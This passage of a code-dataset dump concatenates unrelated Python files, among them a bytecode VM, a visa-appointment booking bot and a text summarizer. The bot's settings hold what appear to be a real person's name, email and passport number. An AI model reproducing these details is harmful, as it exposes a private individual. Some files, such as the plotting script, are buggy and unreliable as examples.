pickle import NEWFALSE\nfrom bitsnbytes import Byte\nfrom enum import Enum\nfrom typing import Callable, List\n\nfrom inspect import currentframe\n\n\ndef formatlist_items(arr: list, length: int) -> list:\n if len(arr) > length:\n arr = arr[len(arr)-length:]\n arr.insert(0,'...')\n return arr\n\ndef ln(offset=0): return currentframe().f_back.f_lineno - offset\n\ndef checkAddress(self, dest: int): return dest in range(len(self.bytes))\n\ndef OP_NOI(self):\n return\ndef OP_PUSH(self):\n self.push()\n if self.debug: print('│ >>> pushing',self.a)\ndef OP_POP(self):\n self.pop()\n if self.debug: print('│ >>> popping',self.a)\ndef OP_LOAD(self):\n self.ic += 1\n self.a = self.get_constant(self.ip.to_int())\n if self.debug: print('│ >>> loading',self.a,'from constant pool')\ndef OP_LODA(self):\n self.ic += 1\n 
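# the constant fetched next is a key into the VM's ptr_pool (an array handle created by OP_NEWA)\n 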
ptr = self.get_constant(self.ip.to_int())\n if self.debug:\n arr = self.get_array(ptr)\n print('│ >>> loaded array',arr,'with pointer',ptr)\n self.a = ptr\ndef OP_STSI(self):\n self.a = len(self.stack)\n if self.debug: print('│ >>> getting stack size')\ndef OP_SWAP(self):\n old_a = self.a\n self.a = self.pop(doreturn=True)\n self.push(value=old_a, doreturn=True)\n if self.debug: print('│ >>> swapped register with stack top')\n\ndef OP_ADD(self):\n self.pop()\n a = self.a\n self.pop()\n b = self.a\n self.a = a + b\n if self.debug: print('│ >>> adding',a,'and',b)\ndef OP_SUB(self):\n self.pop()\n a = self.a\n self.pop()\n b = self.a\n self.a = a - b\n if self.debug: print('│ >>> subtracting',a,'and',b)\ndef OP_MUL(self):\n self.pop()\n a = self.a\n self.pop()\n b = self.a\n self.a = a * b\n if self.debug: print('│ >>> multiplying',a,'by',b)\ndef OP_DIV(self):\n self.pop()\n a = self.a\n self.pop()\n b = self.a\n self.a = a / b\n if self.debug: print('│ >>> dividing',a,'by',b)\ndef OP_NEG(self):\n if self.debug: print('│ >>> negating',self.a)\n self.a = -self.a\n\ndef OP_INPT(self):\n inp = input()\n try: value = float(inp)\n except ValueError: value = 0\n self.a = value\n if self.debug: print('│ >>> read input',self.a)\ndef OP_PRNT(self):\n if self.debug: print('│ >>> printing',self.a)\n return str(int(self.a) if int(self.a) == self.a else self.a)\ndef OP_PRNC(self):\n if self.debug: print('│ >>> printing character')\n return chr(int(self.a))\ndef OP_PRNA(self):\n # ptr = self.a\n arr = self.get_array(self.a)\n if self.debug: print('│ >>> printing array',arr)\n return '{'+str(arr)[1:-1].replace(' ','')+'}'\ndef OP_PRNS(self):\n arr = self.get_array(self.a)\n string = ''.join([chr(x) for x in arr])\n if self.debug: print('│ >>> printing string',string)\n return string\n\ndef OP_CMP(self):\n self.f = self.a == self.stack[-1]\n if self.debug:\n print('│ >>> comparing',self.a,'with',self.stack[-1])\ndef OP_JMP(self):\n self.ic += 1\n dest = self.get_constant(self.ip.to_int())\n if not checkAddress(self, dest):\n return(\"RuntimeError: Jump to address \"+str(dest)+\" failed\")\n else:\n if self.debug: print('│ >>> jumping to address',dest)\n self.ic = dest-1\ndef OP_JMIF(self):\n self.ic += 1\n dest = self.get_constant(self.ip.to_int())\n # self.ic += 1\n if not self.f:\n if self.debug:\n print('│ >>> not jumping to address', dest)\n return\n if not checkAddress(self, dest):\n return(\"RuntimeError: Jump to address \"+str(dest)+\" failed\")\n else:\n if self.debug: print('│ >>> jumping to address',dest)\n self.ic = dest-1\ndef OP_JIFN(self):\n self.ic += 1\n dest = self.get_constant(self.ip.to_int())\n # self.ic += 1\n if self.f:\n if self.debug:\n print('│ >>> not jumping to address', dest)\n return\n if not checkAddress(self, dest):\n return(\"RuntimeError: Jump to address \"+str(dest)+\" failed\")\n else:\n if self.debug: print('│ >>> jumping to address',dest)\n self.ic = dest-1\ndef OP_CALL(self):\n self.ic += 1\n dest = self.get_constant(self.ip.to_int())\n # self.ic += 1\n if not checkAddress(self, dest):\n return(\"RuntimeError: Call to address \"+str(dest)+\" failed\")\n else:\n if self.debug: print('│ >>> jumping to address',dest)\n self.push_ret(self.ic)\n self.ic = dest-1\ndef OP_CAIF(self):\n self.ic += 1\n dest = self.get_constant(self.ip.to_int())\n # self.ic += 1\n if not self.f:\n if self.debug:\n print('│ >>> not calling address',dest)\n return\n if not checkAddress(self, dest):\n return(\"RuntimeError: Call to address \"+str(dest)+\" failed\")\n else:\n if self.debug: print('│ 
>>> calling address',dest)\n self.ret_push(self.ic)\n self.ic = dest-1\ndef OP_CIFN(self):\n self.ic += 1\n dest = self.get_constant(self.ip.to_int())\n # self.ic += 1\n if self.f:\n if self.debug:\n print('│ >>> not calling address',dest)\n return\n if not checkAddress(self, dest):\n return(\"RuntimeError: Call to address \"+str(dest)+\" failed\")\n else:\n if self.debug: print('│ >>> calling address',dest)\n self.ret_push(self.ic)\n self.ic = dest-1\ndef OP_RET(self):\n dest = self.pop_ret()\n if not checkAddress(self, dest):\n return(\"RuntimeError: Return to address \"+str(dest)+\" failed\")\n else:\n if self.debug: print('│ >>> returning to address',dest+1)\n self.ic = dest\n\ndef OP_INC(self):\n self.a += 1\n if self.debug: print('│ >>> incrementing')\ndef OP_DEC(self):\n self.a -= 1 if self.a > 0 else 0\n if self.debug: print('│ >>> decrementing')\n\ndef OP_NEWA(self):\n key = len(self.ptr_pool) + 1\n self.ptr_pool[key] = []\n self.a = key\n if self.debug: print('│ >>> created new array with pointer',key)\ndef OP_PUSA(self):\n self.ic += 1\n val = self.get_constant(self.ip.to_int())\n self.get_array(self.a).append(val)\n if self.debug: print('│ >>> appended',val,'to array')\ndef OP_POPA(self):\n # self.ic += 1\n val = self.get_array(self.a).pop()\n self.stack.append(val)\n if self.debug: print('│ >>> popped',val,'from array onto stack')\ndef OP_SPLT(self):\n olda = self.a\n for item in self.get_array(self.a):\n self.a = item\n self.push()\n self.a = olda\n if self.debug: print('│ >>> split array',\n formatlist_items(self.get_array(self.a), 10),'onto the stack')\ndef OP_JOIN(self):\n key = len(self.ptr_pool) + 1\n self.a = key\n arr = []\n for item in self.stack:\n arr.append(item)\n self.ptr_pool[key] = arr\n if self.debug: print('│ >>> joined stack as array')\n\ndef OP_PUSB(self):\n self.ic += 1\n dest = int(self.get_constant(self.ip.to_int()))\n if not checkAddress(self, dest):\n return(\"RuntimeError: Push byte to address \"+str(dest)+\" failed\")\n else:\n # print(int(self.a))\n if not (int(self.a) >= 0x00 and int(self.a) <= 0xff):\n return(\"RuntimeError: Push byte to address \"+str(int(self.a))+' failed')\n\n if self.debug:\n print('│ >>> pushing byte', Byte(self.a).to_hex(),'to', dest)\n \n self.bytes[dest] = Byte(int(self.a))\n if self.address_to_pixel(dest):\n row, column = self.address_to_pixel(dest)\n self.prunepixel(row, column)\ndef OP_GETB(self):\n self.ic += 1\n dest = self.get_constant(self.ip.to_int())\n if not checkAddress(self, dest):\n return(\"RuntimeError: Get byte from address \"+str(dest)+\" failed\")\n else:\n self.a = self.bytes[dest-1].to_int()\n if self.debug: print('│ >>> getting byte', self.a,'from', dest)\n\ndef OP_NVAR(self):\n self.ic += 1\n varname = self.get_constant(self.ip.to_int(), False)\n # self.ic -= 1\n # print('nvar',varname)\n if self.debug: print('│ >>> creating new variable',varname)\n self.hashtable.insert(varname, 0)\ndef OP_DVAR(self):\n self.ic += 1\n varname = self.get_constant(self.ip.to_int(), False)\n # self.ic -= 1\n # print('dvar',varname)\n if self.debug: print('│ >>> deleting variable',varname)\n self.hashtable.remove(varname)\ndef OP_PUVA(self):\n self.ic += 1\n varname = self.get_constant(self.ip.to_int(), False)\n # self.ic -= 1\n # print('puva',varname)\n if self.debug: print('│ >>> pushing',self.a,'to variable',varname)\n self.hashtable.replace(varname, self.a)\ndef OP_LOVA(self):\n self.ic += 1\n varname = self.get_constant(self.ip.to_int(), False)\n # self.ic -= 1\n # print('lova',varname)\n self.a = 
self.hashtable.find(varname)\n if self.debug: print('│ >>> loading',self.a,'from variable',varname)\ndef OP_INCV(self):\n self.ic += 1\n varname = self.get_constant(self.ip.to_int(), False)\n if self.debug: print('│ >>> incrementing variable',varname)\n self.hashtable.replace(varname, self.hashtable.find(varname)+1)\ndef OP_DECV(self):\n self.ic += 1\n varname = self.get_constant(self.ip.to_int(), False)\n if self.debug: print('│ >>> decrementing variable',varname)\n self.hashtable.replace(varname, self.hashtable.find(varname)-1)\n\ndef OP_OPEF(self):\n self.ic += 1\n name = ''.join([chr(x) for x in self.get_array(self.get_constant(self.ip.to_int()))])\n self.ic += 1\n\n # nibble represents mode:\n # 0b1111\n # │││└ binary=0 text=1\n # ││└ append\n # │└ write\n # └ read\n \n mode = self.get_constant(self.ip.to_int())\n if mode < 0x0 or mode > 0xf:\n # invalid mode\n return(\"RuntimeError: invalid file mode \"+str(bin(mode)))\n bits = [int(x) for x in bin(mode)[2:]]\n while len(bits) < 4:\n bits.insert(0, 0)\n\n if bits[:3] == [0,0,0]:\n return(\"RuntimeError: invalid file mode 0b\"+ ''.join([str(x) for x in bits]) +\\\n ' (at least read, write or append)')\n\n modestr = str()\n if bits[0]: # read\n modestr = 'r'\n\n if bits[1]: # write\n if bits[0]: modestr = 'r+' # also read\n else: modestr = 'w' # just write\n \n elif bits[2]: # append (skipped if already writing)\n if bits[0]: modestr = 'a+' # also read\n else: modestr = 'a' # just append\n \n if not bits[3]: # binary mode\n modestr = modestr.replace('+', 'b+') if '+' in modestr else modestr + 'b'\n \n # opening n shit\n try:\n key = len(self.file_pool) + 1\n self.file_pool[key] = open(self.translate_filename(name), modestr)\n if self.debug: print('│ >>> opening file',name,'with mode',modestr,'with pointer',key)\n self.a = key\n except FileNotFoundError:\n if self.debug: print('│ >>> failed to open file',name,'(file not found)')\ndef OP_CLOF(self):\n self.ic += 1\n key = int(self.get_constant(self.ip.to_int()))\n if key in self.file_pool:\n self.file_pool[key].close()\n self.file_pool.pop(key)\n if self.debug: print('│ >>> closing file with pointer',key)\n elif self.debug: print('│ >>> failed to close file with pointer',key,'(not in file pool)')\ndef OP_SEKF(self):\n self.ic += 1\n key = int(self.get_constant(self.ip.to_int()))\n self.ic += 1\n pos = int(self.get_constant(self.ip.to_int()))\n if key in self.file_pool:\n self.file_pool[key].seek(pos)\n if self.debug: print('│ >>> seeking to',pos,'in file with pointer',key)\ndef OP_WRTF(self):\n self.ic += 1\n key = int(self.get_constant(self.ip.to_int()))\n self.ic += 1\n text = ''.join([chr(x) for x in self.get_array(self.get_constant(self.ip.to_int()))])\n if key in self.file_pool and self.file_pool[key].writable():\n self.file_pool[key].write(text)\n if self.debug: print('│ >>> writing \"'+text+'\" to file with pointer',key)\n elif self.debug: print('│ >>> failed to write to file with pointer',key)\ndef OP_REAF(self):\n self.ic += 1\n key = int(self.get_constant(self.ip.to_int()))\n self.ic += 1\n length = int(self.get_constant(self.ip.to_int()))\n if key in self.file_pool and self.file_pool[key].readable():\n arg = [length] if length else [] \n text = self.file_pool[key].read(*arg)\n textarr = [ord(char) if isinstance(char, str) else char for char in text]\n # textarr.reverse()\n ptr = len(self.ptr_pool) + 1\n self.ptr_pool[ptr] = textarr\n self.a = ptr\n if self.debug: print('│ >>> reading from file with pointer',key,'to array with pointer',ptr)\n\ndef OP_MAKF(self):\n self.ic += 
1\n name = ''.join([chr(x) for x in self.get_array(self.get_constant(self.ip.to_int()))])\n open(self.translate_filename(name), 'a').close()\n if self.debug: print('│ >>> touched file',name)\ndef OP_DELF(self):\n self.ic += 1\n name = ''.join([chr(x) for x in self.get_array(self.get_constant(self.ip.to_int()))])\n os.remove(self.translate_filename(name))\n if self.debug: print('│ >>> deleted file',name)\n\ndef OP_CLST(self):\n self.stack = []\n if self.debug: print('│ >>> clearing stack')\ndef OP_POLL(self):\n self.poll()\n if self.debug: print('│ >>> polling')\ndef OP_WAIT(self):\n self.ic += 1\n sec = self.get_constant(self.ip.to_int())\n if self.debug: print('│ >>> sleeping for',sec,'seconds')\n return [\"sleep\", sec]\ndef OP_KILL(self):\n self.bytes[0] = Byte(0)\n if self.debug: print('│ >>> killing')\n\nclass Ins:#truction\n def __init__(self, byte: Byte, offset_sensitive, *args): # Byte, *args):\n # self.byte = Byte(byte)\n self.byte = Byte(byte)\n # list with arg types\n self.args = args\n self.argc = len(args)\n self.offset_sensitive = offset_sensitive\n self.func: Callable = None\n\nsln = ln()+2\nclass Instruct(Enum):\n NOI = Ins(ln(sln), False)\n # stack\n PUSH = Ins(ln(sln), False)\n POP = Ins(ln(sln), False)\n LOAD = Ins(ln(sln), False, float)\n LODA = Ins(ln(sln), False, list)\n STSI = Ins(ln(sln), False)\n SWAP = Ins(ln(sln), False)\n # arithmetic\n ADD = Ins(ln(sln), False)\n SUB = Ins(ln(sln), False)\n MUL = Ins(ln(sln), False)\n DIV = Ins(ln(sln), False)\n NEG = Ins(ln(sln), False)\n # io\n INPT = Ins(ln(sln), False)\n PRNT = Ins(ln(sln), False)\n PRNC = Ins(ln(sln), False)\n PRNS = Ins(ln(sln), False)\n PRNA = Ins(ln(sln), False)\n # control flow\n CMP = Ins(ln(sln), False)\n JMP = Ins(ln(sln), True, int)\n JMIF = Ins(ln(sln), True, int)\n JIFN = Ins(ln(sln), True, int)\n CALL = Ins(ln(sln), True, int)\n CAIF = Ins(ln(sln), True, int)\n CIFN = Ins(ln(sln), True, int)\n RET = Ins(ln(sln), False)\n # register manipulation\n INC = Ins(ln(sln), False)\n DEC = Ins(ln(sln), False)\n # array\n NEWA = Ins(ln(sln), False)\n PUSA = Ins(ln(sln), False, int)\n POPA = Ins(ln(sln), False)\n SPLT = Ins(ln(sln), False)\n JOIN = Ins(ln(sln), False)\n # byte manipulation\n PUSB = Ins(ln(sln), True, int)\n GETB = Ins(ln(sln), True, int)\n # variable\n NVAR = Ins(ln(sln), False, id)\n DVAR = Ins(ln(sln), False, id)\n PUVA = Ins(ln(sln), False, id)\n LOVA = Ins(ln(sln), False, id)\n INCV = Ins(ln(sln), False, id)\n DECV = Ins(ln(sln), False, id)\n # file io\n OPEF = Ins(ln(sln), False, str, int)\n CLOF = Ins(ln(sln), False, int)\n SEKF = Ins(ln(sln), False, int, int)\n WRTF = Ins(ln(sln), False, int, str)\n REAF = Ins(ln(sln), False, int, int)\n MAKF = Ins(ln(sln), False, str)\n DELF = Ins(ln(sln), False, str)\n #RENF = Ins(ln(sln), False, int, str)\n #GFID = Ins(ln(sln), False, str, int)\n # misc.\n CLST = Ins(ln(sln), False)\n WAIT = Ins(ln(sln), False, float)\n POLL = Ins(ln(sln), False)\n KILL = Ins(ln(sln), False)\n\ndef getinstruct(byteval: int):\n for instruct in Instruct:\n if instruct.value.byte == byteval:\n return instruct\n return False\n\nfor op in Instruct:\n if 'OP_'+op.name not in locals():\n raise NotImplementedError(op.name)\n op.value.func = eval('OP_'+op.name)\n# print('\\n'.join([op.name +' '+str(op.value.byte.to_int()) for op in Instruct]))\n","sub_path":"src/instructions.py","file_name":"instructions.py","file_ext":"py","file_size_in_byte":16277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} 
+{"seq_id":"276580286","text":"import requests\nimport base64\n\ndef twitter_session(api_key, api_secret):\n session = requests.Session()\n secret = '{}:{}'.format(api_key, api_secret)\n secret64 = base64.b64encode(secret.encode('ascii')).decode('ascii')\n\n headers = {\n 'Authorization': 'Basic {}'.format(secret64),\n 'Host': 'api.twitter.com',\n }\n\n r = session.post('https://api.twitter.com/oauth2/token',\n headers=headers,\n data={'grant_type': 'client_credentials'})\n\n bearer_token = r.json()['access_token']\n\n def bearer_auth(req):\n req.headers['Authorization'] = 'Bearer ' + bearer_token\n return req\n\n session.auth = bearer_auth\n return session\n","sub_path":"twitterwall/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"387198665","text":"# Your code here\n# initialize cache\ncache = {}\n\ndef expensive_seq(x, y, z):\n # if x, y, z is in cache return value from cache\n if f\"{x},{y},{z}\" in cache:\n return cache[f\"{x},{y},{z}\"]\n # if x,y,z not in cache run logic, store solution in cache, and return solution\n else:\n if x <= 0:\n solution = y + z\n cache[f\"{x},{y},{z}\"] = solution\n return solution\n elif x > 0:\n solution = expensive_seq(x-1, y+1, z) + expensive_seq(x-2, y+2, z*2) + expensive_seq(x-3, y+3, z*3)\n cache[f\"{x},{y},{z}\"] = solution\n return solution\n\n\nif __name__ == \"__main__\":\n for i in range(10):\n x = expensive_seq(i*2, i*3, i*4)\n print(f\"{i*2} {i*3} {i*4} = {x}\")\n\n print(expensive_seq(150, 400, 800))\n","sub_path":"applications/expensive_seq/expensive_seq.py","file_name":"expensive_seq.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"16468135","text":"import librosa\nimport numpy as np\nimport paddle.fluid as fluid\n\n# 创建执行器\nplace = fluid.CPUPlace()\nexe = fluid.Executor(place)\nexe.run(fluid.default_startup_program())\n\n# 保存预测模型路径\nsave_path = 'models/infer'\n\n\n[infer_program,\n feeded_var_names,\n target_var] = fluid.io.load_inference_model(dirname=save_path, executor=exe)\n\n\n# 读取音频数据\ndef load_data(data_path):\n wav, sr = librosa.load(data_path, sr=16000)\n intervals = librosa.effects.split(wav, top_db=20)\n wav_output = []\n for sliced in intervals:\n wav_output.extend(wav[sliced[0]:sliced[1]])\n # [可能需要修改] 裁剪的音频长度:16000 * 秒数\n wav_len = int(16000 * 2.04)\n # 裁剪过长的音频,过短的补0\n if len(wav_output) > wav_len:\n wav_output = wav_output[:wav_len]\n else:\n wav_output.extend(np.zeros(shape=[wav_len - len(wav_output)], dtype=np.float32))\n wav_output = np.array(wav_output)\n # 获取梅尔频谱\n ps = librosa.feature.melspectrogram(y=wav_output, sr=sr, hop_length=256).astype(np.float32)\n ps = ps[np.newaxis, np.newaxis, ...]\n return ps\n\n\ndef infer(audio_path):\n data = load_data(audio_path)\n # 执行预测\n feature = exe.run(program=infer_program,\n feed={feeded_var_names[0]: data},\n fetch_list=target_var)[0]\n return feature[0]\n\n\nif __name__ == '__main__':\n # 要预测的两个人的音频文件\n person1 = 'dataset/ST-CMDS-20170001_1-OS/20170001P00001A0101.wav'\n person2 = 'dataset/ST-CMDS-20170001_1-OS/20170001P00001A0001.wav'\n feature1 = infer(person1)\n feature2 = infer(person2)\n # 对角余弦值\n dist = np.dot(feature1, feature2) / (np.linalg.norm(feature1) * np.linalg.norm(feature2))\n if dist > 0.7:\n print(\"%s 和 %s 为同一个人,相似度为:%f\" % (person1, person2, dist))\n else:\n print(\"%s 和 %s 不是同一个人,相似度为:%f\" % (person1, person2, 
dist))\n","sub_path":"infer_contrast.py","file_name":"infer_contrast.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"570999444","text":"\"\"\"\nInstall MSL packages.\n\"\"\"\nimport subprocess\nimport sys\n\nfrom . import utils\n\n# Fixes issue #8 (repository name != package name)\n# Not sure how to generalize a universal solution since one is free to choose\n# any repository name and package name, therefore this mapping will need to be\n# updated on a case-by-case basis in future releases of msl-package-manager\n#\n# key: repo name, value: package (egg) name\n_egg_name_map = {\n 'pr-omega-logger': 'omega-logger',\n 'pr-single-photons': 'photons',\n 'pr-superk-mono': 'superk-mono',\n 'pr-webpage-text': 'webpage-text',\n 'rpi-ocr': 'ocr',\n 'rpi-smartgadget': 'smartgadget',\n}\n\n\ndef install(*names, **kwargs):\n \"\"\"Install MSL packages.\n\n MSL packages can be installed from PyPI packages_ (only if a release has been\n uploaded to PyPI) or from GitHub repositories_.\n\n .. note::\n If the MSL packages_ are available on PyPI then PyPI is used as the default\n location to install the package. If you want to force the installation to occur\n from the ``main`` branch from GitHub (even though the package is available on PyPI)\n then set ``branch='main'``. If the package is not available on PyPI\n then the ``main`` branch is used as the default installation location.\n\n .. _repositories: https://github.com/MSLNZ\n .. _packages: https://pypi.org/search/?q=%22Measurement+Standards+Laboratory+of+New+Zealand%22\n\n .. versionchanged:: 2.4.0\n Added the `pip_options` keyword argument.\n\n .. versionchanged:: 2.5.0\n Added the `commit` keyword argument. The default name of a\n repository branch changed to ``main``.\n\n Parameters\n ----------\n *names\n The name(s) of the MSL package(s) to install. If not specified then\n install all MSL packages that begin with the ``msl-`` prefix. The\n ``msl-`` prefix can be omitted (e.g., ``'loadlib'`` is equivalent to\n ``'msl-loadlib'``). Also accepts shell-style wildcards (e.g., ``'pr-*'``).\n **kwargs\n * branch -- :class:`str`\n The name of a git branch to install. If not specified and neither a\n `tag` nor `commit` was specified then the ``main`` branch is used to\n install a package if it is not available on PyPI.\n * commit -- :class:`str`\n The hash value of a git commit to use to install a package.\n * tag -- :class:`str`\n The name of a git tag to use to install a package.\n * update_cache -- :class:`bool`\n The information about the MSL packages_ that are available on PyPI and about\n the repositories_ that are available on GitHub are cached to use for subsequent\n calls to this function. After 24 hours the cache is automatically updated. Set\n `update_cache` to be :data:`True` to force the cache to be updated when you call\n this function. 
Default is :data:`False`.\n * yes -- :class:`bool`\n If :data:`True` then don't ask for confirmation before installing.\n The default is :data:`False` (ask before installing).\n * pip_options -- :class:`list` of :class:`str`\n Optional arguments to pass to the ``pip install`` command,\n e.g., ``['--retries', '10', '--user']``\n\n \"\"\"\n # TODO Python 2.7 does not support named arguments after using *args\n # we can define yes=False, branch=None, ...\n # in the function signature when we choose to drop support for Python 2.7\n utils._check_kwargs(kwargs, {'yes', 'branch', 'commit', 'tag', 'update_cache', 'pip_options'})\n\n yes = kwargs.get('yes', False)\n branch = kwargs.get('branch', None)\n commit = kwargs.get('commit', None)\n tag = kwargs.get('tag', None)\n update_cache = kwargs.get('update_cache', False)\n pip_options = kwargs.get('pip_options', [])\n\n if commit and not utils.has_git:\n utils.log.error('Cannot install from a commit because git is not installed')\n return\n\n github_suffix = utils._get_github_url_suffix(branch=branch, commit=commit, tag=tag)\n if github_suffix is None:\n return\n\n # keep the order of the log messages consistent: pypi -> github -> local\n # utils._create_install_list() does github -> local\n pkgs_pypi = utils.pypi(update_cache)\n packages = utils._create_install_list(names, branch, commit, tag, update_cache)\n if not packages:\n utils.log.info('No MSL packages to install')\n return\n\n utils._log_install_uninstall_message(\n packages, 'INSTALLED', branch=branch, commit=commit, tag=tag, pkgs_pypi=pkgs_pypi\n )\n if not (yes or utils._ask_proceed()):\n return\n\n utils.log.info('')\n\n zip_extn = 'zip' if utils._IS_WINDOWS else 'tar.gz'\n exe = [sys.executable, '-m', 'pip', 'install']\n\n if '--quiet' not in pip_options or '-q' not in pip_options:\n pip_options.extend(['--quiet'] * utils._pip_quiet)\n if '--disable-pip-version-check' not in pip_options:\n pip_options.append('--disable-pip-version-check')\n\n for name, values in packages.items():\n if name in pkgs_pypi and not (branch or commit or tag):\n utils.log.debug('Installing %r from PyPI', name)\n if values['extras_require']:\n name += values['extras_require']\n if values['version_requested']:\n name += values['version_requested']\n subprocess.call(exe + pip_options + [name])\n else:\n utils.log.debug('Installing %r from GitHub[%s]', name, github_suffix)\n if commit or utils.has_git:\n repo = 'git+https://github.com/MSLNZ/{}.git@{}'.format(name, github_suffix)\n else:\n repo = 'https://github.com/MSLNZ/{}/archive/{}.{}'.format(name, github_suffix, zip_extn)\n\n egg_name = _egg_name_map.get(name, name)\n repo += '#egg={}'.format(egg_name)\n if values['extras_require']:\n repo += values['extras_require']\n subprocess.call(exe + pip_options + [repo])\n","sub_path":"msl/package_manager/install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":6027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"405581049","text":"import numpy as np\nimport pandas as pd\nimport matplotlib as plt\n\ndata = pd.read_excel(r\"C:\\Users\\Administrator\\Desktop\\data.xlsx\")\ndata = data.values\nprint(data)\n\ncolumns=[\"15plot1\",\"15plot2\",\"15plot3\",\"15plot4\",\"16plot1\",\"16plot2\",\"16plot3\",\"16plot4\",\"17plot1\",\"17plot2\",\"17plot3\",\"17plot4\"]# 横坐标数值\nrows=['species %d' %x for x in range(38)]# 表格第一列名称\n \nvalues = np.arange(0, 1, 0.1) # 纵坐标数值\nn_rows = len(data)\n\nindex = np.arange(len(columns)) + 0.3\nbar_width = 0.4\n\ncolor = 
plt.cm.paired(np.linspace(0, 0.5, len(rows)))\n#color = [\"red\",\"limegreen\",\"darkorange\",\"black\",\"gold\",\"blue\",\"c\",\"yellow\",\"tan\",\"silver\",\"g\",\"plum\",\"pink\",\"cyan\",\"slategray\",\"violet\",\"wheat\",\"lightcyan\",\"biege\",\"steelblue\",\"tomato\",\"peru\",\"lawngreen\",\"darkcyan\",\"palegreen\",\"indigo\",\"skyblue\",\"teal\",\"navy\",\"hotpink\",\"crimson\",\"cornsilk\",\"darkseagreen\",\"darkkhaki\",\"brown\",\"lightcoral\",\"burlywood\",\"darkslategray\"]\ny_offset = np.array([0.0] * len(columns))\n\n# 绘制条形图\ncell_text = []\nfor row in range(n_rows):\n plt.bar(index, data[row], bar_width, bottom=y_offset, color = plt.cm.coolwarm(range(38)))\n y_offset = y_offset + data[row]\n\nfmt='%.2f%%'\n#yticks = plt.ticker.FormatStrFormatter(fmt)\n\nplt.ylabel(\"ra\")\nplt.xlabel(columns)\nplt.yticks()\nplt.xticks([])\nplt.legend(loc=0)\n\nplt.show()","sub_path":"谱图/plotx.py","file_name":"plotx.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"410822094","text":"from setuptools import setup, find_packages\n\n\n# Package metadata\nmetadata = {}\nwith open('plasmapy/_metadata.py', 'r') as metadata_file:\n exec(metadata_file.read(), metadata)\n\n# Requirements\nwith open('requirements/base.txt', 'r') as req_file:\n requirements = req_file.read().splitlines()\n\nsetup(name=metadata['name'],\n version=metadata['version'],\n description=\"Python package for plasma physics\",\n requires=requirements,\n install_requires=requirements,\n provides=[metadata['name']],\n author=metadata['author'],\n author_email=\"namurphy@cfa.harvard.edu\", # until we get an email address\n license=\"BSD\",\n url=\"https://github.com/PlasmaPy/PlasmaPy\", # until we make a webpage\n long_description=metadata['description'],\n keywords=['plasma', 'plasma physics', 'science'],\n classifiers=[\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3 :: Only',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Scientific/Engineering :: Physics',\n 'Topic :: Scientific/Engineering :: Astronomy',\n 'Development Status :: 2 - Pre-Alpha',\n ],\n packages=find_packages(),\n zip_safe=False,\n use_2to3=False,\n python_requires='>=3.6',\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"174493845","text":"class Solution:\n def maskPII(self, S):\n \"\"\"\n :type S: str\n :rtype: str\n \"\"\"\n if '@' in S:\n return self.mask_email(S)\n else:\n return self.mask_phone(S)\n\n def mask_email(self, S):\n name, tail = S.split('@')\n name = name[0] + '*' * 5 + name[-1]\n masked = name.lower() + '@' + tail.lower()\n return masked\n\n def mask_phone(self, S):\n numbers = []\n for ch in S:\n if ch.isdigit():\n numbers.append(ch)\n masked = None\n if len(numbers) == 10:\n masked = '***-***-' + ''.join(numbers[-4:])\n else:\n masked = '+' + '*' * (len(numbers) - 10) + '-***-***-' + ''.join(numbers[-4:])\n return masked\n","sub_path":"831.py","file_name":"831.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"221338358","text":"import click\nfrom AppointmentSearch_1min import AppointmentSearch\n\n\n@click.command()\n@click.argument('i')\n# 
@click.option('--model-weights')\n@click.option(\"--long_term\", default=0)\n@click.option(\"--timed\", default=0)\n# @click.option(\"--n_gpu\", type=int, default=1, help='Specify the number of GPUs to be used '\n# 'If both n_gpus and gpus are set, then gpus flag will take priority')\ndef main(i,long_term,timed):\n\n params = {\n 'long_term': long_term,\n 'timed': timed,\n 'app_link': 'https://service2.diplo.de/rktermin/extern/appointment_showMonth.do?locationCode=isla&request_locale=en&realmId=108&categoryId=203&dateStr=20.05.2018',\n 'first_name': 'NIGAR HASAN',\n 'last_name': 'SIDDIQUI',\n 'email': 'thanrim@yahoo.com',\n 'repeat_email': 'thanrim@yahoo.com',\n 'passnummer': 'CD5464164',\n 'lower_date': '20.05.2018',\n 'upper_date': '15.06.2018',\n 'img_path': 'data/bot_testing/'+i+'/1',\n 'wrong_cap_dir': 'data/bot_testing/wrong_caps/',\n 'cap_fail_msg': 'entered text was',\n 'no_app_msg': 'New appointments will be made available',\n 'other_month_msg': 'Please select another month',\n 'app_available_msg': 'Please select a date',\n 'odd_path': 'data/bot_testing/curious_case_of_benjamin_button.txt',\n 'txt_file': 'data/bot_testing/1.txt',\n 'iter_id': 1\n\n }\n\n a = AppointmentSearch(params)\n a.search_bot()\n\nif __name__ == '__main__':\n main()\n","sub_path":"run_bot_jehanzeb.py","file_name":"run_bot_jehanzeb.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"344995606","text":"# AAR Natural Language Processing/Machine Learning Project 2015-2016\n# Summarizes text using tf-idf technique\n# Written by Gautam Mittal\n# Mentor: Robert Cheung\n# Requires Node.js and Python 2.7\n\nfrom __future__ import division\nimport math\nfrom textblob import TextBlob as tb\n\ndef tf(word, blob):\n return blob.words.count(word) / len(blob.words)\n\ndef n_containing(word, bloblist):\n return sum(1 for blob in bloblist if 